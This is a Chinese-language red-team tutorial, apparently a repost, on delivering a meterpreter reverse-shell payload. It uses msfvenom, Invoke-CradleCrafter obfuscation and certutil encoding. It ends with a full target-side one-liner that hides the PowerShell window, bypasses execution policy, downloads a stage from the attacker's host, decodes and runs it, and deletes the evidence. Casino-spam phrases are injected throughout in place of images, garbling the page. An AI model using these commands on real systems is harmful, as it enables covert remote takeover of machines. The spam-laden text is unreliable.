澳门威尼斯人平台官网

华盟学院山东省第二期线下学习计划

文章作者:

原文链接:https://micropoor.blogspot.com

第八季中提到了certutil的加密与解密。

C:>certutil  -encode c:downfile.vbs downfile.bat,而配合powershell的内存加载,则可把certutil发挥更强大。

靶机:windows 2012

而今天需要的是一款powershell的混淆框架的配合

https://github.com/danielbohannon/Invoke-CradleCrafter

使用方法:

Import-Module ./Invoke-CradleCrafter.psd1

Invoke-CradleCrafter

Certutil 一句话澳门威尼斯人平台网址 Payload 补充

如果在加载powershell 脚本的时候提示:

powershell 进行数字签运行该脚本。

则先执行:set­executionpolicy Bypass

生成payload:(有关生成payload,会在未来的系列中讲到)

[email protected]:/tmp#msfvenom‐pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.1.5LPORT=53‐e cmd/powershell_base64 ‐f psh ‐o Micropoor.txt

Certutil 一句话澳门威尼斯人平台网址 Payload 补充

启动apache:

Certutil 一句话澳门威尼斯人平台网址 Payload 补充

powershell框架设置:

SET URL http://192.168.1.5/Micropoor.txt

Certutil 一句话澳门威尼斯人平台网址 Payload 补充

MEMORY

Certutil 一句话澳门威尼斯人平台网址 Payload 补充

CERTUTIL

Certutil 一句话澳门威尼斯人平台网址 Payload 补充

ALL

Certutil 一句话澳门威尼斯人平台网址 Payload 补充

1

Certutil 一句话澳门威尼斯人平台网址 Payload 补充

混淆内容保存txt,后进行encode

Certutil 一句话澳门威尼斯人平台网址 Payload 补充

把cer.cer 与Micropoo.txt 放置同一目录下。

目标机执行:

www.idc126.com

1powershell.exe ‐Win hiddeN ‐Exec ByPasS add‐content ‐path %APPDATA%cer.cer(New‐ObjectNet.WebClient).DownloadString('http://192.168.1.5/cer.cer');certutil‐decode%APPDATA%cer.cer %APPDATA%stage.ps1&start/bcmd/cpowershell.exe‐ExecBypass‐NoExitFile%APPDATA%stage.ps1&start/bcmd/cdel%APPDATA%cer.cer

本文由 华盟网 作者:fox 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论